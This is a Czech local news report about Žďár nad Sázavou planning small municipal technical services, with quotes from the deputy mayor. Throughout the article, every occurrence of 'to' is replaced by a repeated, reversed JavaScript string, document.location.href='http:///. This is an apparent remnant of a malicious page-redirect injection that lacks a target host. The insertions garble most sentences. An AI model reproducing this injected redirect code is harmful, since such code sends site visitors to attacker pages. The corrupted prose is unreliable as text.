Rainbow page separator

Ve Žďáře uvažují o obnově technických služeb, ale jen „malých“

Pondělí, 23. září 2019

Žďár nad Sázavou / O „malých“ technických službách už nějakou dobu uvažují zástupci žďárské radnice. Ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to subjekt byl, na rozdíl od ostatních měst žďárského okresu, ve Žďáře zrušen již před lety. V původní velikosti však ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to organizace zřízena nebude.
„Nebudou [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to technické služby velkého rozsahu, jaké mají jiná větší města, ovšem část prací, které pro naše měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vykonávají společnosti na základě smluv, by naše „malé“ technické služby mohly převzít. V současné době vedení města společně s ostatními radními a koaličními zastupiteli hledají nejoptimálnější způsob zřízení malých technických služeb. Mohly by vzniknout v průběhu roku 2020,“ vyjádřila se mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarostka Žďáru nad Sázavou Ludmila Řezníčková.
V současné době už některé práce pro měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to provádí hlavně skupina lidí vykonávajících veřejně prospěšné práce. Jedná se o dlouhodobě nezaměstnané osoby evidované na úřadu práce, na jejichž mzdy úřad doplácí. Vykonávají různé nekvalifikované činnosti v komunální oblasti, jako je například úklid, drobné opravy či údržba městského mobiliáře.